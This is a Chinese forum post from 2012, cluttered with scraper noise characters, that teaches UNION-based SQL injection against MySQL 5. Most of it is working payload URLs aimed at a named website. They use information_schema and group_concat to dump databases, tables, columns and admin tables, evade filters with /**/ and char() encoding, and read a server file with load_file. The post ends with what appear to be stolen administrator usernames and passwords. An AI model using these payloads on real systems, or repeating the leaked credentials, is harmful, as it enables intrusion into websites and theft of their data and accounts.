此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
. J$ y5 A% s" g/ ]! x+ l但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人. b0 j0 \' I2 W
6 s; s9 I; E, w l
+ q( ]; |- V. L! x1 J f9 u
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入9 h$ a4 I9 k' R! e; I. }
% w5 K9 B0 y* P! c
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
1 R0 U$ [7 j4 k9 C) x2 T3 Z4 Q7 P+ ~4 H+ n( W
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示4 X( I u/ X1 g9 N# A
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
8 T# Y) I7 K! `4 m
. g+ @2 J5 n0 `4 vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
9 E" T: K4 z) b1 v; _5 I6 ]
0 T0 M2 [' ?. r \2 F G读出所有库:
# m. \0 M" V3 T! B8 Y, rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
W. M! ]5 p4 m" h0 V6 X4 }% J2 ?+ A2 d+ z$ @+ V. ~! L
( Y I T- R( X9 t1 u; b7 |7 u: h# i. F0 B/ w. B# Z
读出所有表:
4 l0 }7 J1 c0 I' Y- fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
% R* c1 k# N) m/ B* L. u" w+ Y( d1 b( w+ i7 e! Z( w
读出所有表字段:
! q5 b- r3 g1 ^http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
. \ \2 ^) l# A*/ (97,100,109,105,110)为admin的ascii码 依次类推' H: }' m0 P0 Q
% a: [/ Z& s$ ]+ Z( }5 }' N+ @
读出所有表字段里的内容:
7 N- c1 d! U g3 p' s1 S6 }, ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin, i! g) Z0 J8 ?: ]
! y* r: Q" {7 J+ H* y; D
7 S1 m# h& X8 K6 N+ B7 U8 |! y% W2 j) v9 s. F) v
# l, l4 F$ T/ Y) Y& M0 f9 ^$ m$ P6 t( \6 a# Y- s
8 n) h- p0 {$ J* Ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%233 ?8 X' V9 X: H' H. y$ J
( B% ~# z: q1 J! K2 t
$ c7 |/ {3 s$ m% A5 y" X) m2 x o& fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
k: Z8 B6 e7 f* Y3 R, r3 ?, y0 ?) ]- y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23 T0 _& S8 C: P# J- `- B3 t
# y1 `; E7 H1 Z; K y, j8 h7 \, i |, z- X$ E" P/ T
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
# S% F0 g) ^( m9 w4 P. d# F/ b6 D& O/ V/ r+ ?# x) `( H9 w
9 G4 L' `+ x/ V% ?; {
webmaster:dzb521123,simlab:simadmin20043233
( U9 B/ }( l0 u |
发表于 2012-9-13 16:37:34
收藏
支持
反对